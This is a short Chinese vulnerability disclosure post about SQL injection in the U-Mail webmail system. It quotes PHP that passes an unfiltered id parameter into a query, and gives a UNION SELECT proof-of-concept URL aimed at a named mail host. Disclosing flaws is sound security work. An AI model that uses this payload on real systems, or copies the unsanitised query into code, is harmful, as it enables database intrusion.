漏洞文件:client/option/module/views.php
[php]
if ( ACTION == "letterpaper" )
{
$lp_id = gss( $_GET['id'] );
if ( $lp_id )
{
if ( $lp_id == "add" )
{
$lp_info['letterpaper'] = "
";
}
else
{
$lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 );
}
}
else
{
$lp_list = $Widget->get_letterpaper( array(
"fields" => "*",
"where" => "UserID=0 or UserID=".$user_id,
"orderby" => "UserID",
"debug" => 0
) );
}
include( load_tpl( "op_letterpaper" ) );
}
[/php]
未过滤直接进入查询
[php]
$lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 );
[/php]
http://mail.comingchina.com/webmail/client/option/index.php?module=view&action=letterpaper&id=1%20and%201=2%20union%20select%201,2,3,user(),5,6,7,8
[php]
- 本文由 没穿底裤 发表于 2020年1月1日03:37:05
- 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
U-Mail邮件服务系统最新版SQL注入漏洞https://cn-sec.com/archives/75817.html
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.
评论